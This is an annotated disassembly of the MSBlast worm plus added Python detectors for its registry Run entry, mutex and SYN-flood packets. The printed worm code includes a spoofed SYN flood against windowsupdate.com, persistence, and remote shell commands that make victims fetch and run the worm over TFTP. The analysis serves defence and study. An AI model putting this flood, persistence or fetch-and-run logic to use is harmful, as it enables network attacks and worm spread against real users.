lovnet
Analysis of the main code of the msblast worm


; Write the autostart entry to the registry
:00401250  55  push ebp
:00401251  89E5  mov ebp, esp
:00401253  81ECAC030000  sub esp, 000003AC
:00401259  56  push esi
:0040125A  57  push edi
:0040125B  31F6  xor esi, esi
:0040125D  6A00  push 00000000
:0040125F  8D45F8  lea eax, dword ptr [ebp-08]
:00401262  50  push eax
:00401263  6A00  push 00000000
:00401265  683F000F00  push 000F003F
:0040126A  6A00  push 00000000
:0040126C  6A00  push 00000000
:0040126E  6A00  push 00000000
:00401270  685D484000  push 0040485D  ; db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
:00401275  6802000080  push 80000002
:0040127A  E80D110000  Call 0040238C  ; ADVAPI32.RegCreateKeyExA
:0040127F  6A32  push 00000032
:00401281  683C404000  push 0040403C  ; db 'msblast.exe',0
:00401286  6A01  push 00000001
:00401288  6A00  push 00000000
:0040128A  6849484000  push 00404849  ; db 'windows auto update',0
:0040128F  FF75F8  push [ebp-08]
:00401292  E801110000  Call 00402398  ; ADVAPI32.RegSetValueExA
:00401297  FF75F8  push [ebp-08]
:0040129A  E8E1100000  Call 00402380  ; ADVAPI32.RegCloseKey
; Create the mutex
:0040129F  6843484000  push 00404843  ; db 'BILLY',0
:004012A4  6A01  push 00000001
:004012A6  6A00  push 00000000
:004012A8  E8A3100000  Call 00402350  ; KERNEL32.CreateMutexA
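A host-side check for the two persistence artefacts in the listing above, added here as an example (it is not code from the original post). It parses a registry export for values under a ...\CurrentVersion\Run key and flags the value name and data the worm writes ("windows auto update" pointing at msblast.exe), and it checks a list of mutex names for the "BILLY" mutex. The .reg text and the mutex list are constructed samples, and all function names are mine. The listing passes 0x32 as the data length to RegSetValueExA although 'msblast.exe',0 is only 12 bytes, so the comparison tolerates anything after the first NUL.

```python
import re

# Constructed .reg export (not from a real machine): one benign Run value,
# the value the listing writes, and a per-user Run key for contrast.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SoundMan"="SOUNDMAN.EXE"
"windows auto update"="msblast.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"ctfmon.exe"="C:\\WINDOWS\\system32\\ctfmon.exe"
'''

# Constructed list of mutex names as a handle-enumeration tool might report them.
SAMPLE_MUTEXES = ["ShimCacheMutex", "BILLY", "_!MSFTHISTORY!_"]

# Artefacts taken directly from the listing.
AUTORUN_VALUE_NAME = "windows auto update"
AUTORUN_EXE = "msblast.exe"
WORM_MUTEX = "BILLY"

RUN_KEY_RE = re.compile(r"^\[(HKEY_[A-Z_]+\\.*\\CurrentVersion\\Run[^\]]*)\]$", re.I)
VALUE_RE = re.compile(r'^"([^"]*)"="(.*)"$')


def parse_run_entries(reg_text):
    """Return (key, value_name, data) for every string value under a Run key."""
    entries = []
    key = None
    for raw in reg_text.splitlines():
        line = raw.strip()
        if line.startswith("["):
            m = RUN_KEY_RE.match(line)
            key = m.group(1) if m else None  # only track Run keys
            continue
        if key is None:
            continue
        m = VALUE_RE.match(line)
        if m:
            # .reg exports double the backslashes inside string data.
            entries.append((key, m.group(1), m.group(2).replace("\\\\", "\\")))
    return entries


def flag_msblast_autorun(entries):
    """Flag Run values matching the name or executable the listing writes."""
    hits = []
    for key, name, data in entries:
        # cbData 0x32 > strlen+1, so ignore anything past the first NUL.
        exe = data.split("\x00", 1)[0].strip().strip('"')
        basename = exe.rsplit("\\", 1)[-1].lower()
        if name.lower() == AUTORUN_VALUE_NAME or basename == AUTORUN_EXE:
            hits.append((key, name, data))
    return hits


def flag_worm_mutex(mutex_names):
    """Return True if the worm's infection-marker mutex is present."""
    return any(n == WORM_MUTEX for n in mutex_names)


if __name__ == "__main__":
    for hit in flag_msblast_autorun(parse_run_entries(SAMPLE_REG)):
        print("autorun:", hit)
    print("mutex present:", flag_worm_mutex(SAMPLE_MUTEXES))
```

The value-name match is the more robust of the two checks: the data string can be renamed by a variant, but the Run key entry is what the worm depends on to survive a reboot.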
……………………
; Random number that selects which payload to send
:00401476  E8BD0E0000  Call 00402338  ; KERNEL32.GetTickCount
:0040147B  50  push eax  ; the GetTickCount result is used as the srand seed
:0040147C  E8B30F0000  Call 00402434  ; CRTDLL.srand
:00401481  59  pop ecx
:00401482  E8890F0000  Call 00402410  ; CRTDLL.rand
:00401487  B914000000  mov ecx, 00000014
:0040148C  99  cdq
:0040148D  F7F9  idiv ecx
:0040148F  83FA0C  cmp edx, 0000000C
:00401492  7D02  jge 00401496
:00401494  31F6  xor esi, esi
:00401496  C7053431400001000000  mov dword ptr [00403134], 00000001
:004014A0  E86B0F0000  Call 00402410  ; CRTDLL.rand
:004014A5  B90A000000  mov ecx, 0000000A
:004014AA  99  cdq
:004014AB  F7F9  idiv ecx
:004014AD  83FA07  cmp edx, 00000007
:004014B0  7E0A  jle 004014BC
:004014B2  C7053431400002000000  mov dword ptr [00403134], 00000002
……………………
:00401954  833D3431400001  cmp dword ptr [00403134], 00000001  ; this value decides whether the attack code sent targets Windows 2000 or XP
:0040195B  750C  jne 00401969
:0040195D  C785ECEAFFFF9D130001  mov dword ptr [ebp+FFFFEAEC], 0100139D  ; jump address used for Windows XP
:00401967  EB0A  jmp 00401973
:00401969  C785ECEAFFFF9F751800  mov dword ptr [ebp+FFFFEAEC], 0018759F  ; jump address used for Windows 2000
……………………
; Check the date
:004014FC  6A03  push 00000003  ; size of buffer
:004014FE  8D45F4  lea eax, dword ptr [ebp-0C]
:00401501  50  push eax  ; buffer
:00401502  683C484000  push 0040483C  ; db 'd',0  get the day of the month
:00401507  6A00  push 00000000
:00401509  6A00  push 00000000
:0040150B  6809040000  push 00000409  ; "0409" = "en-us; English (United States)"
; Judging from the Locale parameter passed to GetDateFormatA, the author's operating system was set to the US locale.
:00401510  E8E70D0000  Call 004022FC  ; KERNEL32.GetDateFormatA
:00401515  6A03  push 00000003
:00401517  8D45F0  lea eax, dword ptr [ebp-10]
:0040151A  50  push eax
:0040151B  683A484000  push 0040483A  ; db 'M',0  get the month
:00401520  6A00  push 00000000
:00401522  6A00  push 00000000
:00401524  6809040000  push 00000409
:00401529  E8CE0D0000  Call 004022FC  ; KERNEL32.GetDateFormatA
:0040152E  8D45F4  lea eax, dword ptr [ebp-0C]
:00401531  50  push eax
:00401532  E8790E0000  Call 004023B0  ; CRTDLL.atoi
:00401537  59  pop ecx
:00401538  83F80F  cmp eax, 0000000F  ; is the day of the month greater than 15?
:0040153B  7F0F  jg 0040154C  ; if the day is after the 15th, jump to creating the DoS thread
:0040153D  8D7DF0  lea edi, dword ptr [ebp-10]
:00401540  57  push edi
:00401541  E86A0E0000  Call 004023B0  ; CRTDLL.atoi
:00401546  59  pop ecx
:00401547  83F808  cmp eax, 00000008  ; is the month greater than 8 (August)?
:0040154A  7E16  jle 00401562  ; if the month is after August, fall through and create the DoS thread
:0040154C  8D45FC  lea eax, dword ptr [ebp-04]
:0040154F  50  push eax
:00401550  6A00  push 00000000
:00401552  6A00  push 00000000
:00401554  68C11E4000  push 00401EC1  ; DoS subroutine
:00401559  6A00  push 00000000
:0040155B  6A00  push 00000000
:0040155D  E8120E0000  Call 00402374  ; KERNEL32.CreateThread
……………………
; Address-resolution subroutine; the converted result is returned in eax
:00401E8B  55  push ebp
:00401E8C  89E5  mov ebp, esp
:00401E8E  56  push esi
:00401E8F  57  push edi
:00401E90  FF7508  push [ebp+08]
:00401E93  E8D8020000  Call 00402170  ; WS2_32.inet_addr
:00401E98  89C7  mov edi, eax
:00401E9A  31F6  xor esi, esi
:00401E9C  83FFFF  cmp edi, FFFFFFFF
:00401E9F  751A  jne 00401EBB  ; if it is already a dotted IP address, skip ahead; otherwise resolve the host name first
:00401EA1  FF7508  push [ebp+08]
:00401EA4  E827030000  Call 004021D0  ; WS2_32.gethostbyname
:00401EA9  89C6  mov esi, eax
:00401EAB  09F6  or esi, esi
:00401EAD  7505  jne 00401EB4
:00401EAF  83C8FF  or eax, FFFFFFFF
:00401EB2  EB09  jmp 00401EBD
:00401EB4  8B460C  mov eax, dword ptr [esi+0C]
:00401EB7  8B00  mov eax, dword ptr [eax]
:00401EB9  8B38  mov edi, dword ptr [eax]
:00401EBB  89F8  mov eax, edi
:00401EBD  5F  pop edi
:00401EBE  5E  pop esi
:00401EBF  5D  pop ebp
:00401EC0  C3  ret

; DoS subroutine
:00401EC1  55  push ebp
:00401EC2  89E5  mov ebp, esp
:00401EC4  51  push ecx
:00401EC5  53  push ebx
:00401EC6  56  push esi
:00401EC7  57  push edi
:00401EC8  C745FC01000000  mov [ebp-04], 00000001
:00401ECF  68EC474000  push 004047EC  ; db 'windowsupdate.com',0
:00401ED4  E8B2FFFFFF  call 00401E8B  ; address-resolution subroutine
:00401ED9  59  pop ecx
:00401EDA  89C6  mov esi, eax  ; esi holds the resolved IP
:00401EDC  6A01  push 00000001
:00401EDE  6A00  push 00000000
:00401EE0  6A00  push 00000000
:00401EE2  68FF000000  push 000000FF
:00401EE7  6A03  push 00000003
:00401EE9  6A02  push 00000002
:00401EEB  E84C030000  Call 0040223C  ; WS2_32.WSASocketA
:00401EF0  89C7  mov edi, eax
:00401EF2  83F8FF  cmp eax, FFFFFFFF
:00401EF5  7504  jne 00401EFB
:00401EF7  31C0  xor eax, eax
:00401EF9  EB34  jmp 00401F2F
:00401EFB  6A04  push 00000004
:00401EFD  8D45FC  lea eax, dword ptr [ebp-04]
:00401F00  50  push eax
:00401F01  6A02  push 00000002
:00401F03  6A00  push 00000000
:00401F05  57  push edi
:00401F06  E8AD020000  Call 004021B8  ; WS2_32.setsockopt
:00401F0B  83F8FF  cmp eax, FFFFFFFF
:00401F0E  7504  jne 00401F14  ; jump on success
:00401F10  31C0  xor eax, eax
:00401F12  EB1B  jmp 00401F2F
:00401F14  57  push edi
:00401F15  56  push esi
:00401F16  E81B000000  call 00401F36  ; packet-sending function
:00401F1B  83C408  add esp, 00000008
:00401F1E  6A14  push 00000014
:00401F20  E837040000  Call 0040235C  ; KERNEL32.Sleep
:00401F25  EBED  jmp 00401F14
:00401F27  57  push edi
:00401F28  E8C7020000  Call 004021F4  ; WS2_32.closesocket
:00401F2D  31C0  xor eax, eax
:00401F2F  5F  pop edi
:00401F30  5E  pop esi
:00401F31  5B  pop ebx
:00401F32  C9  leave
:00401F33  C20400  ret 0004

; Packet-sending function
:00401F36  55  push ebp
:00401F37  89E5  mov ebp, esp
:00401F39  81EC9C000000  sub esp, 0000009C
:00401F3F  53  push ebx
:00401F40  56  push esi
:00401F41  57  push edi
:00401F42  8D7D9C  lea edi, dword ptr [ebp-64]
:00401F45  8D35B0474000  lea esi, dword ptr [004047B0]
:00401F4B  B90F000000  mov ecx, 0000000F
:00401F50  F3  repz
:00401F51  A5  movsd
:00401F52  66C7857EFFFFFF5000  mov word ptr [ebp+FFFFFF7E], 0050
:00401F5B  E8D8030000  Call 00402338  ; KERNEL32.GetTickCount
:00401F60  50  push eax  ; the GetTickCount result is used as the srand seed
:00401F61  E8CE040000  Call 00402434  ; CRTDLL.srand
:00401F66  E8A5040000  Call 00402410  ; CRTDLL.rand
:00401F6B  898568FFFFFF  mov dword ptr [ebp+FFFFFF68], eax
:00401F71  E89A040000  Call 00402410  ; CRTDLL.rand
:00401F76  B9FF000000  mov ecx, 000000FF
:00401F7B  99  cdq
:00401F7C  F7F9  idiv ecx
:00401F7E  52  push edx  ; rand
:00401F7F  8BBD68FFFFFF  mov edi, dword ptr [ebp+FFFFFF68]
:00401F85  89F8  mov eax, edi
:00401F87  B9FF000000  mov ecx, 000000FF
:00401F8C  99  cdq
:00401F8D  F7F9  idiv ecx
:00401F8F  52  push edx  ; rand
:00401F90  FF3538314000  push dword ptr [00403138]  ; these two addresses hold the first two bytes of the local IP
:00401F96  FF3514304000  push dword ptr [00403014]
; The SYN flood source IP is not fully random: the first two bytes are real and the last two are random.
; This is probably to get past network devices that do not allow addresses outside the local network to connect outward.
:00401F9C  682B484000  push 0040482B  ; db '%i.%i.%i.%i',0
:00401FA1  8DBD6EFFFFFF  lea edi, dword ptr [ebp+FFFFFF6E]
:00401FA7  57  push edi  ; the generated IP
:00401FA8  E87B040000  Call 00402428  ; CRTDLL.sprintf
:00401FAD  8D856EFFFFFF  lea eax, dword ptr [ebp+FFFFFF6E]
:00401FB3  50  push eax
:00401FB4  E8D2FEFFFF  call 00401E8B  ; address-resolution subroutine
:00401FB9  89C3  mov ebx, eax  ; save the converted IP in ebx
; The SYN flood packet is built from here on
:00401FBB  66C745800200  mov [ebp-80], 0002
:00401FC1  0FB7857EFFFFFF  movzx eax, word ptr [ebp+FFFFFF7E]
:00401FC8  50  push eax
; destination port 80
:00401FC9  E88A010000  Call 00402158  ; WS2_32.htons
:00401FCE  89C7  mov edi, eax
:00401FD0  66897D82  mov word ptr [ebp-7E], di
:00401FD4  8B4508  mov eax, dword ptr [ebp+08]
:00401FD7  894584  mov dword ptr [ebp-7C], eax
:00401FDA  C645EC45  mov [ebp-14], 45
:00401FDE  6A28  push 00000028
:00401FE0  E873010000  Call 00402158  ; WS2_32.htons
:00401FE5  89C7  mov edi, eax
:00401FE7  66897DEE  mov word ptr [ebp-12], di
:00401FEB  66C745F00100  mov [ebp-10], 0001  ; ident
:00401FF1  66C745F20000  mov [ebp-0E], 0000  ; Fragment Offset: 0
:00401FF7  C645F480  mov [ebp-0C], 80  ; TTL: 128
:00401FFB  C645F506  mov [ebp-0B], 06  ; Protocol: TCP
:00401FFF  66C745F60000  mov [ebp-0A], 0000
:00402005  8B4508  mov eax, dword ptr [ebp+08]
:00402008  8945FC  mov dword ptr [ebp-04], eax
:0040200B  0FB7857EFFFFFF  movzx eax, word ptr [ebp+FFFFFF7E]
:00402012  50  push eax
:00402013  E840010000  Call 00402158  ; WS2_32.htons
:00402018  89C7  mov edi, eax
:0040201A  66897DDA  mov word ptr [ebp-26], di
:0040201E  8365E000  and dword ptr [ebp-20], 00000000
:00402022  C645E450  mov [ebp-1C], 50
:00402026  C645E502  mov [ebp-1B], 02
:0040202A  6800400000  push 00004000  ; TCP window: 16384
:0040202F  E824010000  Call 00402158  ; WS2_32.htons
:00402034  89C7  mov edi, eax
:00402036  66897DE6  mov word ptr [ebp-1A], di  ; [ebp-1A] TCP window: 16384
:0040203A  66C745EA0000  mov [ebp-16], 0000
:00402040  66C745E80000  mov [ebp-18], 0000
:00402046  8B45FC  mov eax, dword ptr [ebp-04]
:00402049  894594  mov dword ptr [ebp-6C], eax  ; [ebp-6C] destination IP
:0040204C  C6459800  mov [ebp-68], 00
:00402050  C6459906  mov [ebp-67], 06
:00402054  6A14  push 00000014
:00402056  E8FD000000  Call 00402158  ; WS2_32.htons
:0040205B  89C7  mov edi, eax
:0040205D  66897D9A  mov word ptr [ebp-66], di
:00402061  895DF8  mov dword ptr [ebp-08], ebx
:00402064  E8A7030000  Call 00402410  ; CRTDLL.rand
:00402069  B9E8030000  mov ecx, 000003E8
:0040206E  99  cdq
:0040206F  F7F9  idiv ecx
:00402071  89D7  mov edi, edx
:00402073  81C7E8030000  add edi, 000003E8
:00402079  81E7FFFF0000  and edi, 0000FFFF
:0040207F  57  push edi  ; randomly generated source port
:00402080  E8D3000000  Call 00402158  ; WS2_32.htons
:00402085  89C7  mov edi, eax
:00402087  66897DD8  mov word ptr [ebp-28], di
:0040208B  E880030000  Call 00402410  ; CRTDLL.rand
:00402090  898564FFFFFF  mov dword ptr [ebp+FFFFFF64], eax
:00402096  E875030000  Call 00402410  ; CRTDLL.rand  ; randomly generated sequence number
:0040209B  8BBD64FFFFFF  mov edi, dword ptr [ebp+FFFFFF64]
:004020A1  C1E710  shl edi, 10
:004020A4  09C7  or edi, eax
:004020A6  81E7FFFF0000  and edi, 0000FFFF
:004020AC  57  push edi
:004020AD  E8A6000000  Call 00402158  ; WS2_32.htons
:004020B2  89C7  mov edi, eax
:004020B4  81E7FFFF0000  and edi, 0000FFFF
:004020BA  897DDC  mov dword ptr [ebp-24], edi
:004020BD  895D90  mov dword ptr [ebp-70], ebx
:004020C0  6A0C  push 0000000C
:004020C2  8D4590  lea eax, dword ptr [ebp-70]
:004020C5  50  push eax
:004020C6  8D459C  lea eax, dword ptr [ebp-64]
:004020C9  50  push eax
:004020CA  E81D030000  Call 004023EC  ; CRTDLL.memcpy
:004020CF  6A14  push 00000014
:004020D1  8D45D8  lea eax, dword ptr [ebp-28]
:004020D4  50  push eax
:004020D5  8D45A8  lea eax, dword ptr [ebp-58]
:004020D8  50  push eax
:004020D9  E80E030000  Call 004023EC  ; CRTDLL.memcpy
:004020DE  6A20  push 00000020
:004020E0  8D459C  lea eax, dword ptr [ebp-64]
:004020E3  50  push eax
:004020E4  E857FDFFFF  call 00401E40
:004020E9  89C7  mov edi, eax
:004020EB  66897DE8  mov word ptr [ebp-18], di
:004020EF  6A14  push 00000014
:004020F1  8D45EC  lea eax, dword ptr [ebp-14]
:004020F4  50  push eax
:004020F5  8D459C  lea eax, dword ptr [ebp-64]
:004020F8  50  push eax
:004020F9  E8EE020000  Call 004023EC  ; CRTDLL.memcpy
:004020FE  6A14  push 00000014
:00402100  8D45D8  lea eax, dword ptr [ebp-28]
:00402103  50  push eax
:00402104  8D45B0  lea eax, dword ptr [ebp-50]  ; [ebp-50] source port
:00402107  50  push eax
:00402108  E8DF020000  Call 004023EC  ; CRTDLL.memcpy
:0040210D  6A04  push 00000004
:0040210F  6A00  push 00000000
:00402111  8D45C4  lea eax, dword ptr [ebp-3C]
:00402114  50  push eax
:00402115  E8DE020000  Call 004023F8  ; CRTDLL.memset
:0040211A  6A28  push 00000028
:0040211C  8D459C  lea eax, dword ptr [ebp-64]
:0040211F  50  push eax
:00402120  E81BFDFFFF  call 00401E40
:00402125  89C7  mov edi, eax
:00402127  66897DF6  mov word ptr [ebp-0A], di
:0040212B  6A14  push 00000014
:0040212D  8D45EC  lea eax, dword ptr [ebp-14]
:00402130  50  push eax
:00402131  8D459C  lea eax, dword ptr [ebp-64]
:00402134  50  push eax
:00402135  E8B2020000  Call 004023EC  ; CRTDLL.memcpy
:0040213A  83C478  add esp, 00000078
:0040213D  6A10  push 00000010
:0040213F  8D4580  lea eax, dword ptr [ebp-80]
:00402142  50  push eax
:00402143  6A00  push 00000000
:00402145  6A28  push 00000028
:00402147  8D459C  lea eax, dword ptr [ebp-64]
:0040214A  50  push eax
:0040214B  FF750C  push [ebp+0C]
:0040214E  E859000000  Call 004021AC  ; WS2_32.sendto  send the packet
:00402153  5F  pop edi
:00402154  5E  pop esi
:00402155  5B  pop ebx
:00402156  C9  leave
:00402157  C3  ret
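A network-side detection example for the SYN packets this function builds, added here and not code from the original post. Every header trait below is read off the listing: IPv4 header byte 0x45, total length 40, TTL 128, protocol 6, a 20-byte TCP header (0x50) with only SYN set (0x02), destination port 80, window htons(0x4000), source port 1000 + rand() % 1000, and a source address that keeps the infected host's first two octets. Two details follow from byte order rather than from the comments: the identification field is stored as the little-endian word 0x0001, so on the wire it reads 0x0100, and the sequence number is a 16-bit htons() value stored into the 32-bit field, so its low 16 bits are always zero. The two packets embedded are constructed samples, not captures, and all function names are mine.

```python
import struct
import ipaddress


def _ipv4_tcp_syn(src, dst, sport, dport, seq, ttl, ident, window):
    """Build a 40-byte IPv4+TCP SYN with zero checksums (constructed sample helper)."""
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40, ident, 0, ttl, 6, 0,
                     ipaddress.IPv4Address(src).packed,
                     ipaddress.IPv4Address(dst).packed)
    tcp = struct.pack("!HHIIHHHH", sport, dport, seq, 0, 0x5002, window, 0, 0)
    return ip + tcp


# Constructed samples: one laid out exactly as the listing does it, one ordinary SYN.
SAMPLE_MSBLAST = _ipv4_tcp_syn("10.1.77.200", "192.0.2.10", 1500, 80,
                               0x12340000, 128, 0x0100, 0x4000)
SAMPLE_BENIGN = _ipv4_tcp_syn("10.1.5.6", "192.0.2.10", 50000, 80,
                              0x9ABCDEF1, 64, 0x3A2B, 0xFFFF)


def parse_ipv4_tcp(pkt):
    """Parse IPv4 + TCP headers into a dict; None if not IPv4/TCP or truncated."""
    if len(pkt) < 20:
        return None
    (ver_ihl, _tos, _total, ident, frag, ttl, proto, _csum,
     src, dst) = struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    if ver_ihl >> 4 != 4:
        return None
    ihl = (ver_ihl & 0x0F) * 4
    if proto != 6 or len(pkt) < ihl + 20:
        return None
    (sport, dport, seq, _ack, off_flags, window,
     _tcsum, _urg) = struct.unpack("!HHIIHHHH", pkt[ihl:ihl + 20])
    return {"ident": ident, "frag": frag, "ttl": ttl, "src": src, "dst": dst,
            "sport": sport, "dport": dport, "seq": seq,
            "flags": off_flags & 0x3F, "window": window}


TRAIT_COUNT = 7


def msblast_syn_traits(hdr, local_prefix):
    """Names of the listing-derived traits this packet matches.
    local_prefix is the monitored network's first two octets, e.g. (10, 1)."""
    checks = {
        # word 0x0001 written little-endian reads as 0x0100 on the wire
        "ip_ident_0x0100": hdr["ident"] == 0x0100 and hdr["frag"] == 0,
        "ttl_128": hdr["ttl"] == 128,
        "syn_only_to_port_80": hdr["dport"] == 80 and hdr["flags"] == 0x02,
        "window_16384": hdr["window"] == 0x4000,
        "sport_1000_to_1999": 1000 <= hdr["sport"] <= 1999,
        # htons()'d 16-bit value stored as a dword: low half of the field is 0
        "seq_low16_zero": hdr["seq"] & 0xFFFF == 0,
        "src_keeps_local_prefix": tuple(hdr["src"][:2]) == tuple(local_prefix),
    }
    return [name for name, ok in checks.items() if ok]


def is_msblast_syn(hdr, local_prefix):
    """True only when every trait matches; a normal SYN hits at most a few."""
    return len(msblast_syn_traits(hdr, local_prefix)) == TRAIT_COUNT


def flood_sources(packets, local_prefix):
    """Count matching packets per spoofed source address."""
    counts = {}
    for pkt in packets:
        hdr = parse_ipv4_tcp(pkt)
        if hdr and is_msblast_syn(hdr, local_prefix):
            key = str(ipaddress.IPv4Address(hdr["src"]))
            counts[key] = counts.get(key, 0) + 1
    return counts


if __name__ == "__main__":
    for pkt in (SAMPLE_MSBLAST, SAMPLE_BENIGN):
        print(msblast_syn_traits(parse_ipv4_tcp(pkt), (10, 1)))
```

Because the last two octets of the source are random, per-source counting spreads the flood across up to 65536 addresses inside one /16; the fixed identification, window and sequence-number quirks are what tie the packets together, and the /16 prefix points at the infected network.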

………………

; TFTP server function
:00401576  55  push ebp
:00401577  89E5  mov ebp, esp
:00401579  81EC2C040000  sub esp, 0000042C
:0040157F  53  push ebx
:00401580  56  push esi
:00401581  57  push edi
:00401582  C7053840400001000000  mov dword ptr [00404038], 00000001
:0040158C  6A00  push 00000000
:0040158E  6A02  push 00000002  ; SOCK_DGRAM, i.e. UDP
:00401590  6A02  push 00000002
:00401592  E82D0C0000  Call 004021C4  ; WS2_32.socket
:00401597  A324314000  mov dword ptr [00403124], eax
:0040159C  83F8FF  cmp eax, FFFFFFFF
:0040159F  0F8445010000  je 004016EA
:004015A5  6A10  push 00000010
:004015A7  6A00  push 00000000
:004015A9  8D85D8FDFFFF  lea eax, dword ptr [ebp+FFFFFDD8]
:004015AF  50  push eax
:004015B0  E8430E0000  Call 004023F8  ; CRTDLL.memset
:004015B5  83C40C  add esp, 0000000C
:004015B8  66C785D8FDFFFF0200  mov word ptr [ebp+FFFFFDD8], 0002
:004015C1  6A45  push 00000045  ; listen on port 69
:004015C3  E8900B0000  Call 00402158  ; WS2_32.htons
:004015C8  89C2  mov edx, eax
:004015CA  668995DAFDFFFF  mov word ptr [ebp+FFFFFDDA], dx
:004015D1  83A5DCFDFFFF00  and dword ptr [ebp+FFFFFDDC], 00000000
:004015D8  6A10  push 00000010
:004015DA  8D85D8FDFFFF  lea eax, dword ptr [ebp+FFFFFDD8]
:004015E0  50  push eax
:004015E1  FF3524314000  push dword ptr [00403124]
:004015E7  E8F00B0000  Call 004021DC  ; WS2_32.bind
:004015EC  09C0  or eax, eax
:004015EE  0F85F6000000  jne 004016EA
:004015F4  C785F8FDFFFF10000000  mov dword ptr [ebp+FFFFFDF8], 00000010
:004015FE  8D85F8FDFFFF  lea eax, dword ptr [ebp+FFFFFDF8]
:00401604  50  push eax
:00401605  8D85E8FDFFFF  lea eax, dword ptr [ebp+FFFFFDE8]
:0040160B  50  push eax
:0040160C  6A00  push 00000000
:0040160E  6804020000  push 00000204
:00401613  8D85D4FBFFFF  lea eax, dword ptr [ebp+FFFFFBD4]
:00401619  50  push eax
:0040161A  FF3524314000  push dword ptr [00403124]
:00401620  E8630B0000  Call 00402188  ; WS2_32.recvfrom
:00401625  83F801  cmp eax, 00000001  ; was a request received?
:00401628  0F8CBC000000  jl 004016EA
:0040162E  31DB  xor ebx, ebx
:00401630  6837484000  push 00404837  ; db 'rb',0  open the file read-only in binary mode
:00401635  6820304000  push 00403020  ; offset of the absolute path of the worm's own executable
:0040163A  E8950D0000  Call 004023D4  ; CRTDLL.fopen
; This worm sets up its TFTP server the same way Nimda did: whatever file name is requested, it returns the worm file,
; so this TFTP server does not leak system files. Unlike Nimda, the TFTP server only runs after a machine has been attacked successfully,
; so it is normal not to see UDP/69 listening on a system infected with msblast.exe.

………………

; Create the TFTP server thread, then send the tftp command to transfer the file and run it
:00401CBD  8D85CCE6FFFF  lea eax, dword ptr [ebp+FFFFE6CC]
:00401CC3  50  push eax
:00401CC4  6A00  push 00000000
:00401CC6  6A00  push 00000000
:00401CC8  6876154000  push 00401576  ; TFTP server function
:00401CCD  6A00  push 00000000
:00401CCF  6A00  push 00000000
:00401CD1  E89E060000  Call 00402374  ; KERNEL32.CreateThread
:00401CD6  8985C0EDFFFF  mov dword ptr [ebp+FFFFEDC0], eax
:00401CDC  6A50  push 00000050
:00401CDE  E879060000  Call 0040235C  ; KERNEL32.Sleep
:00401CE3  683C404000  push 0040403C  ; db 'msblast.exe',0
:00401CE8  6800304000  push 00403000  ; local IP
:00401CED  680C484000  push 0040480C  ; db 'tftp -i %s GET %s',0
:00401CF2  8D85FCEDFFFF  lea eax, dword ptr [ebp+FFFFEDFC]
:00401CF8  50  push eax
:00401CF9  E82A070000  Call 00402428  ; CRTDLL.sprintf
:00401CFE  83C410  add esp, 00000010
:00401D01  8D8DFCEDFFFF  lea ecx, dword ptr [ebp+FFFFEDFC]
:00401D07  83C8FF  or eax, FFFFFFFF
:00401D0A  40  inc eax
:00401D0B  803C0100  cmp byte ptr [ecx+eax], 00
:00401D0F  75F9  jne 00401D0A
:00401D11  6A00  push 00000000
:00401D13  50  push eax
:00401D14  8D85FCEDFFFF  lea eax, dword ptr [ebp+FFFFEDFC]
:00401D1A  50  push eax
:00401D1B  FFB5F8EDFFFF  push dword ptr [ebp+FFFFEDF8]
:00401D21  E87A040000  Call 004021A0  ; WS2_32.send
:00401D26  83F801  cmp eax, 00000001
:00401D29  0F8CBC000000  jl 00401DEB
:00401D2F  68E8030000  push 000003E8
:00401D34  E823060000  Call 0040235C  ; KERNEL32.Sleep
:00401D39  31DB  xor ebx, ebx
:00401D3B  EB0B  jmp 00401D48

:00401D3D  68D0070000  push 000007D0
:00401D42  E815060000  Call 0040235C  ; KERNEL32.Sleep
:00401D47  43  inc ebx

:00401D48  83FB0A  cmp ebx, 0000000A
:00401D4B  7D09  jge 00401D56
:00401D4D  833D3840400000  cmp dword ptr [00404038], 00000000
:00401D54  75E7  jne 00401D3D
:00401D56  683C404000  push 0040403C  ; db 'msblast.exe',0
:00401D5B  6802484000  push 00404802  ; db 'start %s',0
:00401D60  8D85FCEDFFFF  lea eax, dword ptr [ebp+FFFFEDFC]
:00401D66  50  push eax
:00401D67  E8BC060000  Call 00402428  ; CRTDLL.sprintf
:00401D6C  83C40C  add esp, 0000000C
:00401D6F  8D8DFCEDFFFF  lea ecx, dword ptr [ebp+FFFFEDFC]
:00401D75  83C8FF  or eax, FFFFFFFF

:00401D78  40  inc eax
:00401D79  803C0100  cmp byte ptr [ecx+eax], 00
:00401D7D  75F9  jne 00401D78
:00401D7F  6A00  push 00000000
:00401D81  50  push eax
:00401D82  8D85FCEDFFFF  lea eax, dword ptr [ebp+FFFFEDFC]
:00401D88  50  push eax
:00401D89  FFB5F8EDFFFF  push dword ptr [ebp+FFFFEDF8]
:00401D8F  E80C040000  Call 004021A0  ; WS2_32.send
:00401D94  83F801  cmp eax, 00000001
:00401D97  7C52  jl 00401DEB
:00401D99  68D0070000  push 000007D0
:00401D9E  E8B9050000  Call 0040235C  ; KERNEL32.Sleep
:00401DA3  683C404000  push 0040403C  ; db 'msblast.exe',0
:00401DA8  68FE474000  push 004047FE  ; db '%s',0
:00401DAD  8D85FCEDFFFF  lea eax, dword ptr [ebp+FFFFEDFC]
:00401DB3  50  push eax
:00401DB4  E86F060000  Call 00402428  ; CRTDLL.sprintf
:00401DB9  83C40C  add esp, 0000000C
:00401DBC  8D8DFCEDFFFF  lea ecx, dword ptr [ebp+FFFFEDFC]
:00401DC2  83C8FF  or eax, FFFFFFFF
:00401DC5  40  inc eax
:00401DC6  803C0100  cmp byte ptr [ecx+eax], 00
:00401DCA  75F9  jne 00401DC5
:00401DCC  6A00  push 00000000
:00401DCE  50  push eax
:00401DCF  8D85FCEDFFFF  lea eax, dword ptr [ebp+FFFFEDFC]
:00401DD5  50  push eax
:00401DD6  FFB5F8EDFFFF  push dword ptr [ebp+FFFFEDF8]
:00401DDC  E8BF030000  Call 004021A0  ; WS2_32.send
:00401DE1  68D0070000  push 000007D0
:00401DE6  E871050000  Call 0040235C  ; KERNEL32.Sleep
:00401DEB  83BDF8EDFFFF00  cmp dword ptr [ebp+FFFFEDF8], 00000000
:00401DF2  740B  je 00401DFF
:00401DF4  FFB5F8EDFFFF  push dword ptr [ebp+FFFFEDF8]
